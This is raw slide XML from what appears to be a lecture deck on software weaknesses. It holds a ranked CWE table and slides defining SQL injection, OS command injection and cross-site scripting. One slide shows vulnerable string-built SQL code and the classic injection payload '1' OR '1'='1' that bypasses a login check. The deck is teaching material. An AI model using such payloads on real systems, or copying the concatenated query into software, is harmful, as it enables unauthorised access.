                        </a:rPr>
                        <a:t>[21]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>61.5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>CWE-307</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Improper Restriction of Excessive Authentication Attempts</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[22]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>61.1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>CWE-601</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>URL Redirection to Untrusted Site ('Open Redirect')</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[23]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>61.0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>CWE-134</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Uncontrolled Format String</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="227200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[24]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>60.3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>CWE-190</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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c>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Integer Overflow or Wraparound</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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tcPr>
                </a:tc>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96" name="Shape 296"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 297"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="39285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>The software constructs all or part of an SQL command using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>externally-influenced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t> input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Shape 298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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04" name="Shape 304"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>userName = "1' OR '1'='1";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>"SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Shape 306"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Shape 307"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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12" name="Shape 312"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="39285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>The software constructs all or part of an OS command using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>externally-influenced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t> input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OS Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Shape 315"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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20" name="Shape 320"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 321"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>OS Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="324" name="Shape 324"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123025" y="1823025"/>
            <a:ext cx="7383012" cy="3934200"/>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29" name="Shape 329"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>The software does not neutralize or incorrectly neutralizes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user-controllable input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t> before it is placed in output that is used as a web page that is served to other users.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Shape 331"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Cross-site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Shape 332"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
